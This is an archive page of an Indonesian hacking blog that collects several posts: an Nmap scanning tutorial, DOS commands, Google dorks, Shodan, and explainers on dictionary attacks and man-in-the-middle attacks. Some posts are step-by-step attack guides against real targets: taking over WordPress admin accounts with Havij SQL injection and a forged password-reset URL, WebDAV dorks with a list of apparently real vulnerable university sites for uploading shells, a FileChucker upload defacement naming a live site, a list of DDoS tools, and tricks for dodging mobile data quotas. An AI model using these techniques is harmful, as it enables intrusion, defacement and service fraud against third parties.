New Post

Archive

Tutorial Nmap

cara menggunakan Nmap
Nmap (Network Mapper) adalah sebuah aplikasi atau tool yang berfungsi untuk melakukan port scanning. Nmap dibuat oleh Gordon Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini digunakan untuk meng-audit jaringan yang ada. Dengan menggunakan tool ini, kita dapat melihat host yang aktif, port yang terbuka, Sistem Operasi yang digunakan, dan feature-feature scanning lainnya. Pada awalnya, Nmap hanya bisa berjalan di sistem operasi Linux, namun dalam perkembangannya sekarang ini, hampir semua sistem operasi bisa menjalankan Nmap.

Bentuk dasar dari perintah Nmap adalah :

“nmap “

Untuk optionnya, silakan gunakan perintah :

“nmap –help”

Cara yang paling sederhana untuk mengetahui apakah sebuah komputer atau host aktif atau tidak aktif adalah dengan menggunakan perintah ping sebagai berikut:

C:\>ping server1
Pinging server1 [128.1.10.25] with 32 bytes of data:
Reply from 128.1.10.25: bytes=32 time<10ms ttl=”128″ bytes=”32″ ttl=”128″ bytes=”32″ ttl=”128″ bytes=”32″ ttl=”128″ sent =” 4,” received =” 4,” lost =” 0″ minimum =” 0ms,” maximum =” 0ms,” average =” 0ms”>ping 192.168.1.95
Pinging 192.168.1.95 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.1.95:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>

Misalnya Anda ingin memeriksa apakah ada host yang aktif pada network kelas C dengan nomor IP 192.168.1.1 s/d 192.168.1.10 Maka Anda dapat memeriksa dengan perintah sebagai berikut:
C:\> nmap -sP 192.168.1.91-100

Penggunaan option –O diperuntukan untuk mendeteksi jenis sistem operasi, sebagai berikut:
C:\> nmap -O ristbook

Diatas telah diperkenalkan beberapa option dari Nmap yang merupakan teknik scan. Berikut ini teknik scan lanjutan yang dapat Anda manfaatkan sesuai dengan medan tempur yang ada :

  • TCP connect scan -sT

Jenis scan ini terhubung ke port host target dan menyelesaikan three-way handshake (SYN, SYN/ACK
dan ACK) Scan ini mudah terdeteksi oleh pengelola host target.

  • TCP SYN Scan -sS

Teknik ini dikenal sebagai half-opening scanning karena suatu koneksi penuh tidak sampai terbentuk.Teknik ini bersifat siluman dibandingkan dengan TCP koneksi penuh dan tidak akan tercatat pada log host target.

  • TCP FIN scan –sF

Teknik ini mengirimkan suatu paket FIN ke port host target. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis Unix.

  • TCP Xmas tree scan -sX

Teknik ini mengirimkan suatu paket FIN, URG dan PUSH ke port host target. Berdasarkan RFC 793, host target akan mengembalikan suatu RST untuk semua port yang tertutup.

  • TCP Null scan -sN

Teknik ini membuat off semua flag. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk semua port yang tertutup.

  • TCP ACK scan -sA

Teknik ini digunakan untuk memetakan set aturan firewall. Hal ini sangat membantu Anda dalam menentukan apakah firewall yang dipergunakan adalah simple packet filter yang membolehkan hanya koneksi penuh saja (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering.

  • TCP Windows scan -sW

Teknik ini dapat mendeteksi port-port terbuka maupun terfilter/tidak terfilter pada sistem-sistem tertentu seperti pada AIX dan Free BSD sehubungan dengan anomali dari ukuran windows TCPnya.

  • TCP RPC Scan -sR

Teknik ini spesifik hanya pada sistem Unix dan digunakan untuk mendeteksi dan mengidentifikasi port RPC dan program serta nomor versi yang berhubungan dengannya

  • UDP Scan -sU

Teknik ini mengirimkan suatu paket UDP ke port host target. Bila port host target memberikan response pesan berupa “ICMP port unreachable” artinya port ini tertutup. Sebaliknya bila tidak menerima pesan tersebut, Anda dapat menyimpulkan bahwa port tersebut terbuka. Karena UDP dikenal sebagai connectionless protocol, maka akurasi teknik ini sangat bergantung pada banyak hal sehubungan dengan penggunaan jaringan dan sistem reources lainnya.
Apapun teknik port scan yang akan Anda pergunakan, Anda perlu berhati-hati dalam menggunakan terhadap host target. Tindakan Anda melakukan port scanning ke host target yang bukan wewenang Anda dapat saja menimbulkan reaksi yang mungkin tidak Anda duga sebelumnya dari pengelola host target seperti serangan balik, pemblokiran terhadap acount oleh ISP dan sebagainya. Jadi sebaiknya Anda menguji coba pada sistem Anda sendiri
yang pengen coba aplikasinya langsung menuju ke>>>>> http://nmap.org/

Hack Quota Internet Yang Habis dengan MDMA

Ok,kali ini kami akan berbagi trik untuk mengakali Quota Internet kita yang sudah habis( Khususnya untuk Netter yang menggunakan Paket-paket Unlimited seperti Three,Flash atau lainnya).
Dimana sudah anda ketahui jika Quota paket kita habis maka di pastikan akses internet kita jadi LEMOT.

Kenalkan MDMA,,!
(MDMA)Mobile Data Monitoring Application adalah software untuk memonitor data, trafik, dan signal dari modem atau mobile broadband.
Tool ini yang akan kita pakai untuk Hack Quota Internet yang Habis.Cara sederhana hanya dengan memainkan Apply pada MDMA :D

Sebagai contoh saya menggunakan APN: Telkomsel (2)
Pertama kali pada Conection type rubah ke GPRS/EDGE ONLY (4) dulu
Tunggu sampai dapat sinyal EDGE (1)
Kalau sudah EDGE (1) sinyalnya, rubah ke 3G ONLY (3)
Tapi jangan di Apply dulu
Kita Connect (5) dial dulu
Kalau sudah muncul trafik, yang biasanya di bawah kanan,,baru klik Apply (6)nanti sinyal berubah jadi HSDPA (1)
ni ss nya gan >>>














Hasilnya Browsing Sobat tidak seLo..La sebelumya :D
Jika Soat tertarik silahkan Download MDMA DISINI.
MDMA ini sudah di EDIT agar hanya fitur yg kita gunakan / perlukan yang akan tampil.
Terima Kasih, First post semoga bermanfaat :D

Internetan Gratis Dengan VPN Di PC Laptop Dan HP Android

cara internetan gratis
VPN adalah singkatan dari Virtual Private Network, yang berarti adalah jalur khusus atau private untuk mengakses internet dari jaringan publik. Namun VPN membuat koneksi terlihat sebagai "anonymous atau tanpa identitas" di internet. VPN memberikan keleluasaan dalam mengakses internet dan juga membuat koneksi lebih stabil.
Jadi dengan memanfaatkan jaringan tersebut kita bisa menggunakannya untuk akses internet secara gratis tanpa pulsa dan tanpa kuota. mari kita simak aja :)

Status : Tested & Worked for Provider 3 AoN, XL dan Telkomsel via HP & Laptop 
Khusus HP Android (Rooted)

DroidVPN | Download

Register | Here

Pertama sobat diharuskan mendaftar dulu untuk mendapatkan akun free.












Kemudian Install DroidVPN di perangkat Android sobat lalu jalankan aplikasinya. dan login akun yg sudah sobat daftarkan tadi.
















Yang Dibawah ini
Khusus PC / Laptop

PD-Proxy | Download

Seperti sebelumnya, sobat diharuskan mendaftar akunnya terlebih dahulu..


















Kemudian install aplikasinya dan jalankan.. jika ada muncul perintah buat install driver, iyakan aja :) silahkan masukan username dan password sobat :)


















Manfaat Menggunakan VPN 

Keamanan - VPN memberikan tingkat keamanan tertinggi menggunakan enkripsi canggih dan protokol otentikasi yang melindungi data dari akses yang tidak sah.

Anonymous Surfing - VPN membuat akses internet secara anonim dan mengamankan koneksi Internet dengan memberikan alamat ip baru sehingga terhindar dari pelacakan, 

WiFi Security - Keamanan akses internet di Area Hotspot sehingga lalu lintas data tidak bisa dicuri, atau dimanipulasi karena data terenkripsi.....>>>>>

Perintah DOS (Disk Operating System)

berbagai macam Perintah2 DOS (Disk Operating System)CLS : utk membersihkan layar
VER : menampilkan versi dos yg sedang di pakai
VOL : menampilkan nama/label disket
DATE : menampilkan/mengubah tanggal sistem
TIME : menampilkan/mengubah jam aktif komputer
DIR : utk menampilkan isi disket atau drive
bentuk : DIR [drv][namafile][/p][/w][/a]
contoh : DIR/w = menampilkan isi dari disket/drive yg aktif scra melebar
DIR d:/a/p = menampilkan isi pd drive d, penggunaan /a adalah menampilkan file/folder yg di sembunyikan, penggunaan /p adalah jika layar penuh, berhenti dulu
DIR *.com = menampilkan smua file dgn ekstensi com pd drive yg aktif
DIR d:???.* = menampilkan file pd drive d:, yg namanya maksimal 3 karakter dan ekstensinya bebas.
keterangan :
* = mewakili satu blok nama/ekstensi/smua karakter
? = mewakili satu karakter/huruf

DEL
tujuan:menghapus file atau isi direktori
contoh: C:\>del config.sys = menghapus file config.sys pd drive C:
C:\>del *.exe = menghapus smua nama karakter/file apapun yg berekstensi .exe
C:\>del *.* = menghapus smua nama file dan smua ekstensi

ATTRIB
tujuan:mengubah atribut file
contoh: D:\>attrib = melihat atribut sluruh file pd drive D:
D:\>attrib +R +S +H gambar.jpg = mengubah atribut gambar.jpg mnjadi read only, menjadi file system dan ter hidden scara permanen kcuali dibuka lewat DOS
untuk mengenbalikan tinggal menganti + menjadi -

CD
tujuan:untuk pindah direktori/drive
contoh:CD D:\ = pindah pada drive D:
CD gambar = pindah dr posisi pertama (D:) ke folder gambar

pengalaman sya smua perintah2 di atas sangat berguna saat membasmi virus yg ter protect atau file yg ter protect. Biasanya virus menggunakan autorun.inf utk membantu mengaktifkan diri pd saat kita mengklik drive tertentu, tp klo pke DOS, autorun.inf gk jalan.
tulisan yg sya bold di atas yg sring sya pake..  :iconbiggrin:
bayangin saat kita menggunakan windows explorer tp sring hang, pengen ngapus slah satu file tp gk bs krna access denied atau write protected..klo pke DOS smua itu bisa..
:headbang:

COPY
tujuan:menyalin file
contoh:COPY C:\gambar.jpg D:\gambar.jpg = menyalin file gambar.jpg yg ada di C: ke D:
COPY C:\*.jpg D:\ =menyalin smua file yg berekstensi jpg ke D:\

REN
tujuan:mengubah/mengganti nama file
contoh:C:\> REN ansi.sys rumah.itu = merubah file ansi.sys yg berada di C: menjadi rumah.itu
C:\> REN D:\musik\lagu.mp3 musik.mp3 = posisi kita masih di C: tp bs merubah file yg berada di D:\musik\lagu.mp3 menjadi musik.mp3

FORMAT
tujuan:membentuk ruang/tempat tuk penyimpanan data
contoh: C:\>FORMAT D:/u = pd saat posisi msh di C: lalu memformat drive D: “/u adalah format tanpa konfirmasi dr user/tanpa are you sure to format drive D:??YES or NO”

UNDELETE
tujuan:mengembalikan file yg terhapus
contoh: C:\>UNDELETE = mengembalikan file yg terhapus pd drive C:
C:\> UNDELETE D: = mengembalikan file yg terhapus pd drive D: namun posisi kita masih di C:

LABEL
tujuan:mengubah nama/label/volume disket/drive
contoh:D:\> LABEL C:=merubah nama/label/volume disket/drive C: namun posisi kita msh di D:

DOSKEY
tujuan:menyimpan dan menampilkan kembali instruksi DOS yg pernah kita berikan
catatan:karna bersifat resident, cukup dipanggil sekali sja saat MS DOS terbuka

XCOPY
tujuan:menyalin direktori beserta isinya
contoh:C:\>XCOPY C:\games D:\mainan =menyalin direktori games pd drive C: ke drive D: sekaligus namanya diganti jd mainan

MOVE
tujuan:memindah file/mengganti nama direktori
contoh:C:\>MOVE lagu.mp3 D: = memindahkan file lagu.mp3 yg ada di C: ke D:
C:\>MOVE games mainan = merubah nama folder games yg ada di C: menjadi mainan
catatan:perintah MOVE jika diterapkan pd file akan menghasilkan perintah memindahkan dan jika diterapkan pd folder akan menghasilkan perintah rename

MD
tujuan:membuat direktori/subdirektori
contoh:C:\>MD LAGU = membuat folder LAGU pd drive C:
C:\>MD D:\LAGU = membuat folder LAGU pd drive D saat posisi msh di C:
C:\>MD D:\LAGU\INDONESIA = membuat subfolder INDONESIA pada folder LAGU yg berada di D: dan posisi kita msh di C:

RD
tujuan:menghapus direktori
syarat:direktori yg akan dihapus hrs kosong dan paling sdikit kita berada 1 tingkat di atasnya.
contoh:C:\>RD games = menghapus folder games pd drive C:

TREE
tujuan:menampilkan struktur direktori
contoh:C:\>TREE = menampilkan struktur direktori pd drive C:
C:\>TREE/f = menampilkan struktur direktori beserta file yg berada di dalamnya pd drive C:

DELTREE
tujuan:menghapus seluruh struktur direktori beserta file yg berada di dalamnya
contoh:C:\>DELTREE D:\LAGU\INDONESIA = menghapus folder INDONESIA dan folder yg ada didalamnya serta smua file yg ada didalamnya
C:\>DELTREE D:\LAGU = menghapus folder LAGU serta menghapus seluruh file atau folder yg ada didalamnya

MORE
tujuan:menampilkan output per layar (biasanya digunakan bersama dgn perintah lain melalui PIPE “|”)
contoh:A:\>DIR /? | MORE
A:\>TREE C:\games /F | MORE

COPY CON
tujuan:untuk menuliskan data/pesan berupa karakter text
contoh membuat sebuah konfigurasi:A:\>COPY CON config.sys
DEVICE= HIMEM.SYS
DEVICE=RAMDRIVE.SYS 7180 /E
DOS=HIGH
FILES=30
BUFFERS=20
BREAK=ON
NUMLOCK=OFF

keterangan:
device=himem.sys adalah perintah utk mengaktifkan driver XMS-nya DOS
device=ramdrive.sys adalah mengaktifkan file ramdrive.sys dgn kapasitas sebesar 7180 kb dan diletakkan di extended memory
dos=high adalah io.sys dan msdos.sys diletakkan di memori atas
files=30 adalah jumlah file yg bs dibuka maksimum 30 file
buffers=20 adalah berarti mememsan ruang sementara utk akses disket sebesar 20×532 = 10640 byte = 10 kb dst.
break=on adalah mengaktifkan fungsi penekanan Ctrl + C
numlock=off adalah mengganti fungsi tombol angka pd keypad dgn fungsi lain.

PROMPT
tujuan:mengubah bentuk tampilan prompt DOS
contoh:PROMPT $t $n$g akan menghasilkan 9:45:35.30 A>
PROMPT $d$n$g akan menghasilkan Mon 09-21-1997 A>
PROMPT $v$n$g akan menghasilkan MS-DOS Version 7.20 A>

keterangan:
$t=menampilkan jam sistem
$d=menampilkan tanggal sistem
$v=menampilkan versi DOS
$p=menampilkan direktori aktif
$n=menampilkan drive aktif
$g=menampilkan tanda >
$L=menampilkan tanda <
$_=pindah baris ke baris berikutnya

FILES
tujuan:menentukan jumlah file maksimum yg bs dibuka secara bersamaan
contoh:FILES=x
nilai x ini berkisar 8 s/d 255. default adalah 8, setiap kali x naik 1, menyebabkan memory berkurang 48 byte (normalnya FILES=30)

BUFFERS
tujuan:mengalokasikan sejumlah buffer (ruang sementara) disket saat komputer diaktifkan
contoh:BUFFERS=x
nilai x berkisar 1 s/d 99, default dipengaruhi oleh RAM dan media disk yg ada, setiap penambahan 1 dari x membutuhkan memory 532 byte

DEVICE
tujuan:mengambil dan mengaktifkan driver pendukung suatu media ke memory internal
contoh:DEVICE=Himem.sys (file Himem.sys harus ada)

PIPE
tujuan:untuk menggabungkan dua perintah
bentuk: |
contoh:A:\>TREE C:\games /F | MORE
keterangan:TREE adalah perintah pertama sedangkan MORE adalah perintah kedua

untuk mengeluarkan HELP pd DOS ketikkan “/?” setelah perintah DOS tanpa tanda kutip
contoh:C:\>DIR/?
catatan:DOS tidak membedakan huruf kapital, tp jika slah perintah maka akan muncul lpesan kesalahan “Bad command or file name”

Hack Wordpress dengan Teknik Activation Key

>> Tools yang akan kita pakai disini cukup Havij saja. Saya sarankan Havij 1.15 saja sudah cukup
>> dork google : inurl:/?fbconnect_action=myhome
Terserah yang mana aja, coba coba dan bereksplorasi deh...
anggap aja kita dapat ni 1 targetnya, tampilan situsnya jd ginian (Maaf situs di samarkan, demi keamanan bersama)

bobol wordpress


Nah setelah itu, copy-paste situsnya ke dalam Havij. Dan jalankan Analyze, seperti biasa pemakaian Havij. Pasti udh tau semua kan ???
jadi seperti ini nih






















Seperti biasa dalam pemakaian Havij, kita sudah dapat DB nya kan...
sekarang mencari isi tablesnya, pilih tab menu Get Tables. Maka akan muncul sedemikian rupa tables nya, pilih tables wp-users











Setelah itu langkah selanjutnya pilih tab menu Get Coloumns
cek list user_login dan user_activation_key

jika sudah dapat maka masukkan
wp-login.php?action=rp&key=user_activation_key&login=user_login

jadi gini
http://www.situs.com/wp-login.php?action...user_login
[Image: 12yy.png]

Cukup sekian dulu yah... pasti udh tau deh ngelanjutinnya, udh punya 100% kendali di tangan anda...
Good Luck Horeeeeeee,,,,,,,

Dork Webdav Vulnerability Terbaru

DORK WEBDAV
Bagi Penguna Setia salah satu aplikasi yang di buat oleh hacker indonesia Hmei7 ini yang berfungsi menitipkan file atau shell ke suatu web yang vuln.



Berikut Dork Webdav Vulnerability Terbaru :

  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY


Kita cari web target dengan memasukan Dork diatas kedalam pencarian Google, jika sudah keluar hasil penelusuranya kita tinggal pilih target dari hasil yang sudah ditampilkan google tadi. Caranya pada alamat url web target kita ketikan kata /webdav. Contoh: http://www.webtarget.com/webdav

Jika muncul halaman yang bertuliskan “WebDAV testpage”, berarti web tersebut dapat kita hack. Contohnya seperti web dibawah ini:
http://www.hebron.edu/webdav/
http://www.jcjc.edu/webdav/
http://archnet.asu.edu/webdav/
http://mvl.mit.edu/webdav/
http://www.engl.niu.edu/webdav/
http://www.mstc.edu/webdav/

SITUS SSH GRATIS

SSH GRATIS
Kumpulan Situs Penyedia SSH Gratis - Info Menarik : Pasti lebih senang bukan memakai ssh gratisan.

SSH gratisan tidak kalah hebat dari ssh premium yang dijual belikan.

Berikut Daftar Situs SSH Gratis :

http://www.sshfree.com/
http://www.sshgratis.com/
http://starluzz.blogspot.com/
http://freesshgratis.blogspot.com

TOOLS DDOS

APLIKASI UNTUK MELAKUKAN DDOS
DDos merupakan serangan yang ke pusat inti atau server
Website atau forum yang ingin diddos.

Serangan ddsos cukup berbahaya yang bisa bikin website atau server bisa down.

Berikut Tools DDos yang cukup ampuh :>>>


  • Anonymous DoSer


  •  Anonymous External Attack
  •  ByteDOS v3.2
  • Hoic Vercion v2.1
  • LOIC
  • PoWeRFuL DoSeR 
  • Jays Booter
  • Site_Hog_v1_Release
  • SYN-Flood-DOS
  • Turbinas VolkSv1
  • rDos + Port Scanner
  • GoodBye v3.0
  • Joker IP Reserve Tool
  • Viiru Loic

DEFACE DENGAN EXPLOIT FILECHUCKER

cara deface dengan file chuker
Deface Dengan Exploit FileChucker File Upload Vulnerability - Deface : File Chucker merupakan bug yang terdapat pada front pengisian data pada suatu website:
Dengan mengisi form kita dapat menitipkan file deface kita.
Dork FileChucker File Upload Vulnerability :

  • inurl:/cgi-bin/filechucker.cgi
  • intext:Toptown File Upload
  • inurl:/cgi-bin/filechucker.pl
  • intext:File Upload by Encodable

Cari Target saya mengunakan dork di atas ,  http://toptown.co.uk/cgi-bin/filechucker.cgi
Isi Form dengan data kalian
File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif



  • Letak File deface http://site.com/upload/files/file_kalian 

Sekian tutorial  Exploit FileChucker File Upload Vulnerability 
Thanks To Indonesia Security Down and Newbie Boy
Semoga Bermanfaat DAri Elephant-id

TUTORIAL DICTIONARY ATTACK

TUTORIAL MELAKUKAN DICTIONARY ATTACKDalam lingkup kriptanalisis dan keamanan komputer, dictionary attack adalah teknik untuk mengalahkan cipher atau  mekanisme  autentikasi  dengan  cara  menentukan kunci dekripsi atau frase khusus dengan mencari kombinasi kata-kata yang paling memungkinkan yang terdapat pada sebuah kamus.
Dictionary attack menyerang target dengan mencoba semua kata-kata yang didefinisikan dalam sebuah exhaustive list secara berulang, yang disebut juga dengan istilah kamus atau dictionary. Berbeda dengan brute force attack  yang  menggunakan  semua  kemungkinan kombinasi karakter yang lingkup domainnya sangat luas, dictionary attack hanya mencoba kemungkinan- kemungkinan yang memiliki peluang keberhasilan tinggi (most likely to succeed), yang secara tipikal diturunkan dari kata-kata yang terdapat dalam kamus. Kamus disini didefinisikan sebagai sebuah “list of kata” yang tiap-tiap elemennya adalah kombinasi dari kata-kata yang terdapat dari  sebuah  kamus  (misalnya  kamus  bahasa  Inggris, kamus bahasa Indonesia, dan sebagainya). Dictionary attack seringkali berhasil karena kebanyakan orang menggunakan kata-kata yang lazim terdapat dalam percakapan sehari-hari dalam menentukan password sebuah akunnya (password e-mail, situs web, dan sebagainya). Pengembangan dari dictionary attack juga memungkinkan penyerang untuk menghemat tenaga dan waktu dengan melakukan komputasi “list of kata”, atau disebut juga list of hashes, dalam kata-kata dalam kamus dan menyimpan kata-kata tersebut dalam basis data (atau file teks) dengan menggunakan hash sebagai kuncinya. Mengkomputasikan program dictionary attack membutuhkan waktu yang cukup lama, terutama untuk mendefinisikan kata-kata yang akan menjadi “amunisi” dalam   menebak   password. Namun ketika program tersebut sudah siap untuk menyerang, serangan dapat dieksekusi dengan cepat dan efektif, tergantung dari komputasi atau modifikasi yang disusun oleh penyerang.
Sistem operasi seperti Windows menyimpan password ke dalam bentuk terenkripsi yang disebut hashes. Password tidak dapat diambil (retrieved) secara langsung dari hashes. Untuk melakukan recover password diperlukan komputasi terhadap hashes dengan possible password (kata-kata yang diduga sebagai password) dan memasukkannya ke dalam list of hashes. Dalam konteks keamanan sebuah password, misalnya password akun e-mail, akun administrator situs web, dan sebagainya, manusia seringkali memilih kata yang mudah diingat supaya tidak lupa dengan password akun yang telah dibuatnya, Sebagai contoh, banyak pengguna email yang menggunakan kata ‘admin‘, ‘administrator‘, ‘supervisor‘, ‘password‘, dan sebagainya sebagai password   default,   atau   menggunakan  password  yang berasal dari tanggal lahir, nama orang tua, lokasi rumah, dan lain-lain agar mudah diingat Hacker  mengumpulkan  kata-kata yang  sering digunakan  sebagai  password  ini  ke  dalam  sebuah  file yang dinamakan sebagai dictionary (kamus) dan file ini bisa didapatkan dengan mudah di Internet seperti di situs http://lastbit.com/dict.asp, atau kita juga bisa membuatnya sendiri atau menambahkannya dari file dictionary yang sudah ada.
Program cracking akan mengubah satu persatu kata-kata yang ada di dalam kamus berdasarkan fungsi hash yang digunakan ke dalam bentuk tabel hash. Hasil perubahan ini kemudian dicocokkan dengan hash pada file password yang didapatkan.
Apabila hasil hash ini cocok, artinya password sudah berhasil diketahui. Dengan teknik ini, hacker tidak perlu mencoba semua kombinasi karakter yang ada (seperti brute force attack) sehingga bisa menghemat banyak waktu dan tenaga.

MESIN PENCARI UNTUK PARA HACKER

shodanShodan, sebuah mesin mencari yang kabarnya cukup menakutkan dan banyak digunakan oleh hacker.
Mesin pencari yang di buat oleh John Matherly, berbeda dengan Google. Mesin pencari buatan Amerika itu hanya  digunakan untuk mencari sebuah artikel, situs, atau informasi lainnya, sedangkan Shodan digunakan untuk mencari  server, webcam, printer, router, dan semua hal yang terhubung dengan internet. Shodan bekerja 24/7 dan mengumpulkan semua informasi mengenai 500 juta perangkat dan layanan yang terhubung dengan internet setiap bulan. Mesin pencari “gelap” Shodan ini mampu mencari sistem kontrol untuk taman air, pompa bensin.cybersecurity yang merupakan peneliti dibidang keamanan internet  berhasil menemukan bahwa, mesin pencari Shodan ini mampu mengetahui sistem kendali lampu lalu lintas, kamera keamanan. Bahkan sistem pembangkit listrik tenaga nuklir dapat ditemukan oleh Shodan.
Shodan dikembangkan oleh John Matherly sejak tiga tahun lalu yang pada awalnya hanya sebagai sebuah proyek sampingan. Namun sekarang  mesin pencari ini sudah menjadi andalan para hacker. John Matherly mengatakan bahwa Shodan membatasi hingga 10 hasil pencarian tanpa akun dan 50 hasil pencarian jika menggunakan akun. Dan dia juga mengatakan Shodan diciptakan untuk tujuan kebaikan.
jika anda ingin mencoba silahkan kunjungi langsung menuju Tkp>>>>>>>>> www.shodanhq.com

JENIS-JENIS DORK GOOGLE

JENI-JENIS GOOGLE DORK
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk mencari informasi yang tepat dan akurat. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. Perintah – perintah tersebut :

1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda kutip). Pencarian akan mencari page yang mengandung kata ”password” sebagai judulnya dengan prioritas utama ”admin”.

Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ”admin” dan ”mdb”.

2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database mdb”.

Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:” untuk mendapatkan list url tersebut.

Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”. Tanda garis miring slash (/) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda kutip). Pencarian akan mencari topik tentang waveguide pada semua halaman yang tersedia pada domain ugm.ac.id.

4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.

5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf” yang mengandung kata Linux dan Hacking.

6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list web pages yang memiliki link pada web page special. Sebagai contoh: ”link:www.detik.com” akan menunjukkan daftar web page yang memiliki point link pada halaman situs Detik.

7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Detik.

8. intext:
Sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.

Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi ”pedang” yang bisa dimanfaatkan untuk menggali informasi yang tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak. Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan suatu sistem melalui jaringan internet biasanya menggunakan google sebagai sarana praktis untuk footprinting (penggalian data sistem yang akan diaudit). Pada kesempatan mendatang, akan kita coba menguak beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan otak kanan kita

TURORIAL MAN IN THE MIDDLE ATTACK

Man In The Middle Attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat.
Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing
Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.

Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm :

GAMBAR MAN IN THE MIDDLE ATTACK

Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

  • Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
  • Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
  • Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
  • Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.
Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle
Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.
Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

  • Menyamar sebagai Bob dihadapan Alice
  • Menyamar sebagai Alice dihadapan Bob

GAMBAR ILUSTRASI MAN IN THE MIDDLE ATTACK


Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.

